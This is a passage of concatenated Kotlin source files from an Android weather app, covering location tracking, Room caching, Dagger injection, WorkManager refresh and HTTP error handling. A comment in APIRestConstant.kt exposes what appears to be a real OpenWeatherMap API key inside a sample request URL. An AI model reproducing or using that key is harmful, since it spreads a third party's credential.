}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/WeatherActivity.kt
package com.geeta.weatherapp.ui
import android.Manifest
import android.annotation.SuppressLint
import android.app.Activity
import android.app.AlertDialog
import android.content.Context
import android.content.Intent
import android.content.pm.PackageManager
import android.location.LocationManager
import android.os.Bundle
import android.provider.Settings
import android.view.View
import android.widget.Toast
import androidx.core.app.ActivityCompat
import androidx.core.content.ContextCompat
import androidx.databinding.DataBindingUtil
import androidx.lifecycle.Observer
import androidx.lifecycle.ViewModelProvider
import androidx.work.Data
import androidx.work.PeriodicWorkRequest
import androidx.work.WorkManager
import com.cafecraft.aps.ui.base.BaseActivity
import com.geeta.weatherapp.R
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.databinding.ActivityWeatherBinding
import com.geeta.weatherapp.ui.viewmodel.LocationViewModel
import com.geeta.weatherapp.ui.viewmodel.WeatherViewModel
import com.geeta.weatherapp.utils.*
import com.geeta.weatherapp.worker.WeatherWork
import kotlinx.android.synthetic.main.activity_weather.*
import java.util.concurrent.TimeUnit
import javax.inject.Inject
class WeatherActivity : BaseActivity() {
@Inject
lateinit var weatherViewModel: WeatherViewModel
@Inject
lateinit var locationViewModel: LocationViewModel
var PERMISSION_ID = 44
// var mFusedLocationClient: FusedLocationProviderClient? = null
lateinit var locationData:LocationModel
@Inject
lateinit var weatherViewModelFactory: ViewModelProvider.Factory
@Inject
lateinit var appData: AppData
private var mPeriodicWorkRequest: PeriodicWorkRequest? = null
lateinit var activityWeatherBinding: ActivityWeatherBinding
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
// setContentView(R.layout.activity_weather)
activityWeatherBinding = DataBindingUtil.setContentView(this, R.layout.activity_weather);
ViewModelProvider(this,weatherViewModelFactory).get(LocationViewModel::class.java)
ViewModelProvider(this,weatherViewModelFactory).get(WeatherViewModel::class.java)
setLiveDataListeners()
// startLocationUpdate()
        cancelPeriodicWork() // cancel any previously scheduled WorkManager refresh
}
override fun onStart() {
super.onStart()
// if(appData.locationModel==null)
startLocationUpdate()
if(appData.locationModel!=null)
weatherViewModel.getWeather()
}
private fun startLocationUpdate() {
// progressBar.visibility = View.VISIBLE
locationViewModel.getLocationData().observe(this, Observer {
if(appData.locationModel==null)
weatherViewModel.getWeather()
else if(appData.locationModel!=null && appData.locationModel?.longitude!=it.longitude
&& appData.locationModel?.latitude!=it.latitude )
                weatherViewModel.getCurrentWeather()
appData.locationModel=it
// progressBar.visibility = View.GONE
})
}
private fun setLiveDataListeners() {
/**
* If ViewModel failed to fetch weather , this LiveData will be triggered.
* I know it's not good to make separate LiveData both for Success and Failure, but for sake
* of simplification I did it. We can handle all of our errors from our Activity or Fragment
* Base classes. Another way is: using a Generic wrapper class where you can set the success
* or failure status for any types of data model.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
/* weatherViewModel.getLocationData()?.observe(this, Observer { locationData->
weatherViewModel.getWeather()
})*/
weatherViewModel.weatherInfoFailureLiveData.observe(this, Observer { errorMessage ->
Toast.makeText(this, errorMessage, Toast.LENGTH_LONG).show()
})
/**
* ProgressBar visibility will be handled by this LiveData. ViewModel decides when Activity
* should show ProgressBar and when hide.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
weatherViewModel.progressBarLiveData.observe(this, Observer { isShowLoader ->
if (isShowLoader)
progressBar.visibility = View.VISIBLE
else
progressBar.visibility = View.GONE
})
weatherViewModel.locationDetail.observe(this, Observer {
            weatherViewModel.getCurrentWeather()
})
/**
* This method will be triggered when ViewModel successfully receive WeatherData from our
* data source (I mean Model). Activity just observing (subscribing) this LiveData for showing
* weather information on UI. ViewModel receives Weather data API response from Model via
* Callback method of Model. Then ViewModel apply some business logic and manipulate data.
* Finally ViewModel PUSH WeatherData to `weatherInfoLiveData`. After PUSHING into it, below
* method triggered instantly! Then we set the data on UI.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
weatherViewModel.weatherData.observe(this, Observer { weatherData ->
setWeatherInfo(weatherData)
})
/**
* If ViewModel faces any error during Weather Info fetching API call by Model, then PUSH the
* error message into `weatherInfoFailureLiveData`. After that, this method will be triggered.
* Then we will hide the output view and show error message on UI.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
weatherViewModel.weatherInfoFailureLiveData.observe(this, Observer { errorMessage ->
            showErrorInScreen(errorMessage)
showRetryAlertForWeather(errorMessage)
})
}
    private fun showErrorInScreen(message: String)
    {
        output_group.visibility = View.GONE
        tv_error_message.visibility = View.VISIBLE
        tv_error_message.text = message
    }
/* private fun forecastWeather() {
weatherViewModel.getWeather()
}*/
private fun setWeatherInfo(weatherData: WeatherModel) {
activityWeatherBinding.weatherdata=weatherData
output_group.visibility = View.VISIBLE
tv_error_message.visibility = View.GONE
}
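    // Background refresh: WorkManager re-runs WeatherWork every 2 hours; periodic work
    // cannot run more often than every 15 minutes, so a 2-hour period is safely above
    // the platform minimum.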
    fun startPeriodicWork()
{
// var outData=Data.Builder().put(KEY_WEATHER,WeatherModel())
mPeriodicWorkRequest = PeriodicWorkRequest.Builder(
WeatherWork::class.java,
2, TimeUnit.HOURS
)
.addTag("periodicWorkRequest")
.build()
WorkManager.getInstance(this).enqueue(mPeriodicWorkRequest!!)
}
    fun cancelPeriodicWork()
{
WorkManager.getInstance(this).cancelAllWork()
}
fun showRetryAlertForWeather(message: String) {
val builder = AlertDialog.Builder(this, R.style.MaterialAlertDialogStyle)
builder.setMessage(message).setTitle(R.string.app_name).setCancelable(true)
builder.setNeutralButton("Ok") { dialog, which ->
weatherViewModel.getWeather()
dialog.dismiss() }
builder.setNegativeButton(getString(R.string.cencel)){
dialog, which -> dialog.dismiss()
}
builder.create().show()
}
override fun onDestroy() {
super.onDestroy()
        startPeriodicWork() // schedule the background refresh via WorkManager
appData.locationModel=null
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/WorkerModule.kt
package com.geeta.weatherapp.injection.module
import com.geeta.weatherapp.injection.scopes.WorkerModelKey
import com.geeta.weatherapp.worker.WeatherWork
import com.geeta.weatherapp.worker.WeatherWorkerFactory
import com.geeta.weatherapp.worker.WorkerSFactory
import dagger.Binds
import dagger.Module
import dagger.multibindings.IntoMap
@Module
abstract class WorkerModule {
@Binds
@IntoMap
@WorkerModelKey(WeatherWork::class)
abstract fun bindHelloWorldWorker(factory: WorkerSFactory): WeatherWorkerFactory
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/repositry/WeatherDbRepositoryLis.kt
package com.geeta.weatherapp.database.repositry
import androidx.lifecycle.LiveData
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.WeatherDataDao
import io.reactivex.Observable
interface WeatherDbRepositoryLis{
fun getWeatherDetail(): Observable<WeatherModel>
fun deletWeatherDetail()
fun insertWeatherDatail(weatherModel: WeatherModel)
fun getDateAndTime():Observable<List<Int>>
fun getLocation(): Observable<List<LocationModel>>
fun deletLocationDetail()
fun insertLocation(locationModel: LocationModel)
}<file_sep>/app/src/main/java/com/geeta/weatherapp/api/APIRestConstant.kt
package com.geeta.weatherapp.api
import com.geeta.weatherapp.BuildConfig
/**
* Created by Geetanjali.Naik on 02-02-2018.
*/
class APIRestConstant {
companion object {
const val BASE_API_URL = BuildConfig.BASE_URL/*"http://api.openweathermap.org/data/2.5/"*/
// http://api.openweathermap.org/data/2.5/weather?id=7778677&appid=5ad7218f2e11df834b0eaf3a33a39d2a
const val GET_WEATHER = "weather?"
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/data/weather/WeatherResponse.kt
package com.geeta.weatherapp.data.weather
import androidx.room.Embedded
import androidx.room.Entity
import androidx.room.PrimaryKey
import androidx.room.TypeConverters
import com.geeta.weatherapp.database.DataConverter
import com.google.gson.annotations.SerializedName
data class Coord(@SerializedName("lon")
var lon: Double? = 0.0,
@SerializedName("lat")
var lat: Double? = 0.0)
data class Wind(@SerializedName("deg")
var deg: Int? = 0,
@SerializedName("speed")
var speed: Double? = 0.0,
@SerializedName("gust")
var gust: Double? = 0.0)
data class Clouds(@SerializedName("all")
var all: Int? = 0)
@Entity
data class WeatherItem(@SerializedName("icon")
var icon: String? = "",
@SerializedName("description")
var description: String? = "",
@SerializedName("main")
var main: String? = "",
@SerializedName("id")
@PrimaryKey var weatherItemId: Int? = 0)
data class Sys(@SerializedName("country")
var country: String? = "",
@SerializedName("sunrise")
var sunrise: Int? = 0,
@SerializedName("sunset")
var sunset: Int? = 0,
@SerializedName("id")
var sysId: Int? = 0,
@SerializedName("type")
var type: Int? = 0)
data class Main(@SerializedName("temp")
var temp: Double? = 0.0,
@SerializedName("temp_min")
var tempMin: Double? = 0.0,
@SerializedName("humidity")
var humidity: Int? = 0,
@SerializedName("pressure")
var pressure: Double? = 0.0,
@SerializedName("feels_like")
var feelsLike: Double? = 0.0,
@SerializedName("temp_max")
var tempMax: Double? = 0.0)
@Entity(tableName = "WeatherData")
data class WeatherModel(@SerializedName("visibility")
var visibility: Int? = 0,
@SerializedName("timezone")
var timezone: Int? = 0,
@SerializedName("main")
@Embedded var main: Main?,
@SerializedName("clouds")
@Embedded var clouds: Clouds?,
@SerializedName("sys")
@Embedded var sys: Sys?,
@SerializedName("dt")
var dt: Int? = 0,
@SerializedName("coord")
@Embedded var coord: Coord?,
@TypeConverters(DataConverter::class)
@SerializedName("weather")
var weather: List<WeatherItem>??,
@SerializedName("name")
var name: String? = "",
@SerializedName("cod")
var cod: Int? = 0,
@SerializedName("id")
@PrimaryKey var weathModelId: Int? = 0,
@SerializedName("base")
var base: String? = "",
@SerializedName("wind")
@Embedded var wind: Wind?)
<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WeatherWork.kt
package com.geeta.weatherapp.worker
import android.annotation.SuppressLint
import android.content.Context
import android.location.Location
import android.util.Log
import androidx.work.Data
import androidx.work.Worker
import androidx.work.WorkerParameters
import com.geeta.weatherapp.R
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.api.datamanager.WeatherDataManager
import com.geeta.weatherapp.api.services.WeatherService
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.utils.AppUtils
import com.geeta.weatherapp.utils.CommonResponseParser
import com.google.android.gms.location.LocationServices
import io.reactivex.android.schedulers.AndroidSchedulers
import io.reactivex.schedulers.Schedulers
import javax.inject.Inject
class WeatherWork @Inject constructor( context: Context, workerParameters: WorkerParameters) : Worker(context,workerParameters) {
var weatherDataManager: WeatherDataManager? =null
override fun doWork(): Result {
Log.i("WEATHERAPP","Inside work")
if(AppUtils.isWifiNetworkAvailable(applicationContext))
            getCurrentWeather()
return Result.success()
}
@SuppressLint("CheckResult")
    fun getCurrentWeather()
{
Log.i("WEATHERAPP","Start API")
var serviceweather: WeatherService? = WorkmanagerNetwork.getClient()?.create(WeatherService::class.java)
Log.i("WEATHERAPP","Start API 111")
WeatherDbRepository.invoke(applicationContext).locationDataDao().getLocation()
.subscribeOn(Schedulers.newThread())
.flatMap { result->
if(result==null|| result.isEmpty())
throw Throwable(applicationContext.getString(R.string.unable_fatch_data))
else
return@flatMap serviceweather?.let {
WorkerRepository(it).updateWeather(result[0].latitude,result[0].longitude)}
}
.map{result->
var weatherDataDao=WeatherDbRepository.invoke(applicationContext).weatherDataDao()
weatherDataDao.deleteAll()
weatherDataDao.insertWeather(result)
return@map result
}
.subscribe()
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WorkmanagerNetwork.kt
package com.geeta.weatherapp.worker
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.network.ErrorInterceptor
import com.jakewharton.retrofit2.adapter.rxjava2.RxJava2CallAdapterFactory
import okhttp3.OkHttpClient
import okhttp3.logging.HttpLoggingInterceptor
import retrofit2.Retrofit
import retrofit2.converter.gson.GsonConverterFactory
import retrofit2.converter.scalars.ScalarsConverterFactory
import java.util.concurrent.TimeUnit
class WorkmanagerNetwork {
companion object {
fun getClient(): Retrofit? {
val interceptor = HttpLoggingInterceptor()
interceptor.setLevel(HttpLoggingInterceptor.Level.BODY)
val client =
OkHttpClient.Builder()
.connectTimeout(1200.toLong(), TimeUnit.SECONDS)
.readTimeout(1200.toLong(), TimeUnit.SECONDS)
.addInterceptor(interceptor)
.addInterceptor(ErrorInterceptor())
.build()
var retrofit = Retrofit.Builder()
.baseUrl(BuildConfig.BASE_URL)
.addConverterFactory(ScalarsConverterFactory.create())
.addConverterFactory(GsonConverterFactory.create())
.addCallAdapterFactory(RxJava2CallAdapterFactory.create())
.client(client)
.build()
return retrofit
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/WeatherDataDao.kt
package com.geeta.weatherapp.database
import androidx.room.*
import androidx.room.OnConflictStrategy.REPLACE
import com.geeta.weatherapp.data.weather.WeatherModel
import io.reactivex.Maybe
import io.reactivex.Observable
@Dao
interface WeatherDataDao {
@Query("SELECT * from weatherData")
fun getWeather(): Observable<WeatherModel>
@Query("SELECT dt from weatherData")
fun getDate():Observable<List<Int>>
@Query("SELECT dt from weatherData")
fun getWeatherDataDT():Int
@Insert(onConflict = REPLACE)
fun insertWeather(weatherData: WeatherModel)
@Query("DELETE from weatherData")
fun deleteAll()
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/repositry/LocationDataDao.kt
package com.geeta.weatherapp.database.repositry
import androidx.room.Dao
import androidx.room.Insert
import androidx.room.OnConflictStrategy
import androidx.room.Query
import com.geeta.weatherapp.data.weather.LocationModel
import io.reactivex.Observable
@Dao
interface LocationDataDao {
@Query("SELECT * from locationData")
fun getLocation(): Observable<List<LocationModel>>
@Insert(onConflict = OnConflictStrategy.REPLACE)
fun insertLocation(weatherData: LocationModel)
@Query("DELETE from locationData")
fun deleteAll()
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/WeatherDataBase.kt
package com.geeta.weatherapp.database
import androidx.room.Database
import androidx.room.RoomDatabase
import androidx.room.TypeConverters
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.DataConverter
import com.geeta.weatherapp.database.WeatherDataDao
import com.geeta.weatherapp.database.repositry.LocationDataDao
import javax.inject.Inject
@Database(entities = arrayOf(WeatherModel::class,LocationModel::class), version = 1, exportSchema = false)
@TypeConverters(DataConverter::class)
abstract class WeatherDataBase :RoomDatabase() {
abstract fun weatherDataDao(): WeatherDataDao
abstract fun locationDataDao():LocationDataDao
}<file_sep>/app/src/main/java/com/geeta/weatherapp/utils/AppData.kt
package com.geeta.weatherapp.utils
import android.view.View
import android.widget.TextView
import androidx.databinding.BindingAdapter
import com.geeta.weatherapp.data.weather.LocationModel
const val KEY_WEATHER = "KEY_WEATHER"
class AppData{
var aapkey: String = ""
var locationModel:LocationModel?=null
}
const val LOCATION_REQUEST = 100
const val GPS_REQUEST = 101
@BindingAdapter("android:timestamp")
public fun setTimeStamp(view: TextView, time:Int){
view.text=time.unixTimestampToTimeString()
}
@BindingAdapter("android:dateTime")
public fun setDate(view: TextView, time:Int){
view.text=time.unixTimestampToDateTimeString()
}
@BindingAdapter("android:visibilitytext")
public fun setVisibilityText(view: TextView, visibility:Int){
view.text="${visibility?.div(1000.0)} KM"
}
@BindingAdapter("android:temperature")
public fun settemperature(view: TextView, temperature:Double){
view.text=temperature.kelvinToCelsius().toString()
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/viewmodel/LocationViewModel.kt
package com.geeta.weatherapp.ui.viewmodel
import android.app.Application
import androidx.lifecycle.AndroidViewModel
import com.geeta.weatherapp.ui.livedata.LocationLiveData
import javax.inject.Inject
class LocationViewModel @Inject constructor(application: Application) : AndroidViewModel(application) {
private val locationData = LocationLiveData(application)
fun getLocationData() = locationData
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/scopes/PerApplication.kt
package com.geeta.weatherapp.injection.scopes
import javax.inject.Qualifier
import javax.inject.Scope
@Scope
@Retention(AnnotationRetention.RUNTIME)
annotation class PerApplication
@Scope
@Retention(AnnotationRetention.RUNTIME)
annotation class ApplicationContext<file_sep>/app/src/main/java/com/geeta/weatherapp/WeatherApplication.kt
package com.geeta.weatherapp
import android.content.Context
import androidx.multidex.MultiDexApplication
import com.facebook.stetho.Stetho
import com.geeta.weatherapp.injection.ApplicationComponent
import com.geeta.weatherapp.injection.DaggerApplicationComponent
//import com.geeta.weatherapp.injection.DaggerApplicationComponent
import dagger.android.*
import javax.inject.Inject
open class WeatherApplication: MultiDexApplication() , HasAndroidInjector {
// lateinit var applicationComponent: DaggerApplicationComponent
@Inject
lateinit var anyDispatchingAndroidInjector: DispatchingAndroidInjector<Any>
// val appComponent = DaggerApplicationComponent.create()
override fun onCreate() {
super.onCreate()
appContext=this
buildComponent()
// setUpStethoInspector()
}
open fun buildComponent(){
DaggerApplicationComponent.builder().application(this)
.build().inject(this)
} /*:ApplicationComponent=
DaggerApplicationComponent.builder().application(this)
.build()*/
companion object {
var appContext: Context? = null
var applicationComponent:ApplicationComponent?=null
fun getApplicationComponet():ApplicationComponent?{
return applicationComponent
}
fun getApplicationContext(): Context? {
return appContext
}
}
override fun androidInjector(): AndroidInjector<Any> {
return anyDispatchingAndroidInjector
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/ApplicationComponent.kt
package com.geeta.weatherapp.injection
import android.app.Application
import com.geeta.weatherapp.WeatherApplication
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.repositry.WeatherDbRepositoryLis
import com.geeta.weatherapp.injection.module.ActivityBindingModule
import com.geeta.weatherapp.injection.module.AppViewModule
import com.geeta.weatherapp.injection.module.DataBaseModule
import com.geeta.weatherapp.injection.module.WorkerModule
import com.geeta.weatherapp.injection.scopes.PerApplication
import com.geeta.weatherapp.network.NetworkModule
import dagger.BindsInstance
import dagger.Component
import dagger.android.support.AndroidSupportInjectionModule
import javax.inject.Singleton
@PerApplication
@Singleton
@Component(modules = arrayOf(
AndroidSupportInjectionModule::class,
ActivityBindingModule::class,
/*WeatherApplicationModule::class,*/
NetworkModule::class,
/*DataBaseModule::class,*/
WorkerModule::class,
AppViewModule::class))
interface ApplicationComponent {
@Component.Builder
interface Builder {
@BindsInstance
fun application(application: Application): Builder
/* @BindsInstance
fun dataModule(dataBaseModule: DataBaseModule):Builder*/
fun build(): ApplicationComponent
}
fun inject(app: WeatherApplication)
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/ActivityBindingModule.kt
package com.geeta.weatherapp.injection.module
import com.geeta.weatherapp.injection.scopes.PerActivity
import com.geeta.weatherapp.ui.WeatherActivity
import com.geeta.weatherapp.ui.WeatherPermissionActivity
import dagger.Module
import dagger.android.ContributesAndroidInjector
@Module
abstract class ActivityBindingModule() {
@PerActivity
@ContributesAndroidInjector
abstract fun weatherPermissionActivity(): WeatherPermissionActivity
@PerActivity
@ContributesAndroidInjector
abstract fun weatherActivity(): WeatherActivity
}<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WorkerRepository.kt
package com.geeta.weatherapp.worker
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.services.WeatherService
import com.geeta.weatherapp.data.weather.WeatherModel
import io.reactivex.Observable
class WorkerRepository(val weatherService: WeatherService) {
fun updateWeather(lat:Double,lon:Double): Observable<WeatherModel>
{
return weatherService.getCurrentWeather(lat,lon,BuildConfig.APP_ID)
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/api/datamanager/WeatherDataManager.kt
package com.geeta.weatherapp.api.datamanager
import android.app.Application
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.utils.AppData
import io.reactivex.Observable
import javax.inject.Inject
class WeatherDataManager @Inject constructor(var mBaseApiManager: BaseApiManager/*,var weatherDbRepository: WeatherDbRepository */) {
@Inject
lateinit var appData: AppData
@Inject
lateinit var application: Application
fun updateWeather(lat :Double,lon:Double): Observable<WeatherModel>
{
return mBaseApiManager.weatherService.getCurrentWeather(lat,lon,BuildConfig.APP_ID)
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/livedata/LocationLiveData.kt
package com.geeta.weatherapp.ui.livedata
import android.annotation.SuppressLint
import android.content.Context
import android.location.Location
import androidx.lifecycle.LiveData
import androidx.lifecycle.Observer
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.google.android.gms.location.LocationCallback
import com.google.android.gms.location.LocationRequest
import com.google.android.gms.location.LocationResult
import com.google.android.gms.location.LocationServices
import io.reactivex.Completable
import io.reactivex.schedulers.Schedulers
import javax.inject.Inject
class LocationLiveData @Inject constructor(val context: Context) : LiveData<LocationModel>() {
private var fusedLocationClient = LocationServices.getFusedLocationProviderClient(context)
override fun onInactive() {
super.onInactive()
fusedLocationClient.removeLocationUpdates(locationCallback)
}
@SuppressLint("MissingPermission")
override fun onActive() {
super.onActive()
fusedLocationClient.lastLocation
.addOnSuccessListener { location: Location? ->
location?.also {
setLocationData(it)
}
}
startLocationUpdates()
}
@SuppressLint("MissingPermission")
private fun startLocationUpdates() {
fusedLocationClient.requestLocationUpdates(
locationRequest,
locationCallback,
null
)
}
private val locationCallback = object : LocationCallback() {
override fun onLocationResult(locationResult: LocationResult?) {
locationResult ?: return
for (location in locationResult.locations) {
setLocationData(location)
}
}
}
private fun setLocationData(location: Location) {
value = LocationModel(
longitude = location.longitude,
latitude = location.latitude
)
Completable.fromRunnable(Runnable{
var locationDataDao= WeatherDbRepository.invoke(context).locationDataDao()
locationDataDao.deleteAll()
locationDataDao.insertLocation(value!!)
})
.subscribeOn(Schedulers.io())
.subscribe()
}
companion object {
val locationRequest: LocationRequest = LocationRequest.create().apply {
            interval = 5000
            fastestInterval = 1000 // fastestInterval must not exceed interval
priority = LocationRequest.PRIORITY_HIGH_ACCURACY
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WorkerSFactory.kt
package com.geeta.weatherapp.worker
import android.content.Context
import androidx.work.Worker
import androidx.work.WorkerParameters
import javax.inject.Inject
class WorkerSFactory @Inject constructor() : WeatherWorkerFactory{
override fun create(appContext: Context, params: WorkerParameters): Worker {
return WeatherWork(appContext,params)
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/data/ErrorResponse.kt
package com.geeta.weatherapp.data
import com.google.gson.annotations.SerializedName
data class ErrorResponse(
@SerializedName("defaultUserMessage")
var mDefaultUserMessage: String? = "",
@SerializedName("developerMessage")
var mDeveloperMessage: String? = "",
@SerializedName("httpStatusCode")
var mHttpStatusCode: String? = "",
@SerializedName("userMessageGlobalisationCode")
var mUserMessageGlobalisationCode: String? = "",
@SerializedName("errors")
var errors: List<Errors> = listOf()
) {
data class Errors(
@SerializedName("developerMessage")
var developerMessage: String? = "",
@SerializedName("defaultUserMessage")
var defaultUserMessage: String? = "",
@SerializedName("userMessageGlobalisationCode")
var userMessageGlobalisationCode: String? = "",
@SerializedName("parameterName")
var parameterName: String? = ""
)
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/scopes/PerFragment.kt
package com.geeta.weatherapp.injection.scopes
import javax.inject.Scope
/**
* Created by Geetanjali on 05/01/18.
*/
@Scope
@Retention(AnnotationRetention.RUNTIME)
annotation class PerFragment<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/scopes/WorkerModelKey.kt
package com.geeta.weatherapp.injection.scopes
import androidx.lifecycle.ViewModel
import androidx.work.Worker
import dagger.MapKey
import java.lang.annotation.*
import java.lang.annotation.Retention
import java.lang.annotation.Target
import kotlin.reflect.KClass
@Documented
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
@MapKey
internal annotation class WorkerModelKey(val value: KClass<out Worker>)<file_sep>/app/src/main/java/com/geeta/weatherapp/utils/CommonResponseParser.kt
package com.geeta.weatherapp.utils
import com.geeta.weatherapp.data.ErrorResponse
import com.google.gson.Gson
import retrofit2.HttpException
import java.io.IOException
/**
* Created by Geeta on 20/08/18.
*/
class CommonResponseParser {
object CONSTANT {
val SUCCESS = 1
val FAILURE = 0
}
object ErrorParser {
fun parseError(throwableError: Throwable, isReadMessage: Boolean): String? {
val errorMessage: String
try {
                if (throwableError is HttpException) {
                    errorMessage = throwableError.response()?.errorBody()!!.string()
                    val status = Gson().fromJson(errorMessage, ErrorResponse::class.java)
                    return if (isReadMessage) {
                        status.mDeveloperMessage
                    } else {
                        status.mHttpStatusCode
                    }
                }
                // The original duplicated the HttpException branch and returned the
                // same value for both IOException and other throwables; collapse them.
                return throwableError.message
} catch (throwable: Throwable) {
return "Something went wrong"
}
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/utils/AppUtils.kt
package com.geeta.weatherapp.utils
import android.content.Context
import android.content.pm.PackageManager
import android.net.ConnectivityManager
import android.net.NetworkCapabilities
import android.os.Build
import android.os.Environment
import android.os.StatFs
import java.text.ParseException
import java.text.SimpleDateFormat
import java.util.*
import java.net.Inet4Address
import java.net.NetworkInterface
import java.net.SocketException
/**
* Created by Geeta on 04/02/19.
*/
class AppUtils {
companion object {
fun isNetworkAvailable(context: Context): Boolean {
var result = false
val connectivityManager = context.getSystemService(Context.CONNECTIVITY_SERVICE) as ConnectivityManager
if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.M){
val networkCapabilities = connectivityManager.activeNetwork ?: return false
val actNw =
connectivityManager.getNetworkCapabilities(networkCapabilities) ?: return false
result = when {
actNw.hasTransport(NetworkCapabilities.TRANSPORT_WIFI) -> true
actNw.hasTransport(NetworkCapabilities.TRANSPORT_CELLULAR) -> true
actNw.hasTransport(NetworkCapabilities.TRANSPORT_ETHERNET) -> true
else -> false
}
}else{
val activeNetworkInfo = connectivityManager.activeNetworkInfo
result= activeNetworkInfo != null && activeNetworkInfo.isConnected
}
return result
}
fun isWifiNetworkAvailable(context: Context): Boolean {
var result = false
val connectivityManager =
context.getSystemService(Context.CONNECTIVITY_SERVICE) as ConnectivityManager
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
val networkCapabilities = connectivityManager.activeNetwork ?: return false
val actNw =
connectivityManager.getNetworkCapabilities(networkCapabilities) ?: return false
result = when {
actNw.hasTransport(NetworkCapabilities.TRANSPORT_WIFI) -> true
else -> false
}
} else {
val activeNetworkInfo = connectivityManager.activeNetworkInfo
result= activeNetworkInfo != null && activeNetworkInfo.isConnected &&(activeNetworkInfo.type==ConnectivityManager.TYPE_WIFI)
}
return result
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/repositry/WeatherDbRepository.kt
package com.geeta.weatherapp.database.repositry
import android.content.Context
import androidx.lifecycle.LiveData
import androidx.room.Room
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.WeatherDataDao
import io.reactivex.Maybe
import io.reactivex.Observable
import javax.inject.Inject
import javax.inject.Singleton
@Singleton
class WeatherDbRepository @Inject constructor(val weatherDataDao: WeatherDataDao,val locationDataDao: LocationDataDao) :
WeatherDbRepositoryLis {
companion object {
@Volatile
private var weatherDataBase: WeatherDataBase? = null
private val LOCK = Any()
operator fun invoke(context: Context) = weatherDataBase ?: synchronized(LOCK) {
weatherDataBase ?: buildDatabase(context).also { weatherDataBase = it }
}
private fun buildDatabase(context: Context) = Room.databaseBuilder(
context,
WeatherDataBase::class.java, "weather_db"
).build()
}
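        // Illustrative usage (added): the companion's invoke operator exposes the
        // database singleton as WeatherDbRepository(context); LocationLiveData calls
        // WeatherDbRepository.invoke(context).locationDataDao() in exactly this way.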
override fun getWeatherDetail():Observable<WeatherModel> {
return weatherDataDao.getWeather()
}
override fun deletWeatherDetail() {
weatherDataDao.deleteAll()
}
override fun insertWeatherDatail(weatherModel: WeatherModel) {
weatherDataDao.insertWeather(weatherModel)
}
override fun getDateAndTime(): Observable<List<Int>> {
return weatherDataDao.getDate()
}
override fun getLocation(): Observable<List<LocationModel>> {
return locationDataDao.getLocation()
}
override fun deletLocationDetail() {
locationDataDao.deleteAll()
}
override fun insertLocation(locationModel: LocationModel) {
locationDataDao.insertLocation(locationModel)
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/network/ErrorInterceptor.kt
package com.geeta.weatherapp.network
import com.geeta.weatherapp.data.ErrorResponse
import com.google.gson.Gson
import okhttp3.Interceptor
import okhttp3.Request
import okhttp3.Response
import okhttp3.ResponseBody
import org.json.JSONException
import org.json.JSONObject
class ErrorInterceptor : Interceptor {
override fun intercept(chain: Interceptor.Chain): Response {
        val request: Request = chain.request()
        val response = chain.proceed(request)
        val contentType = response.body?.contentType()
        if (response.code == 200 || response.code == 201 || response.code == 202 || response.code == 204) {
            return response
        }
        // Map known HTTP errors to a user-facing message. The original chain gave
        // 400 the message "Internal Server Error", 405 the status string "403",
        // and 500 the message "Service unavailable"; those are corrected here.
        val (message, code) = when (response.code) {
            400 -> "Bad Request" to "400"
            401 -> "Unauthorized" to "401"
            403 -> "Forbidden" to "403"
            404 -> "Not Found" to "404"
            405 -> "Method Not Allowed" to "405"
            408 -> "Request Timeout" to "408"
            415 -> "Unsupported Media Type" to "415"
            429 -> "Too Many Requests, please try after some time" to "429"
            443 -> "Server has some problem, please try after some time" to "443"
            500 -> "Internal Server Error" to "500"
            503 -> "Service unavailable" to "503"
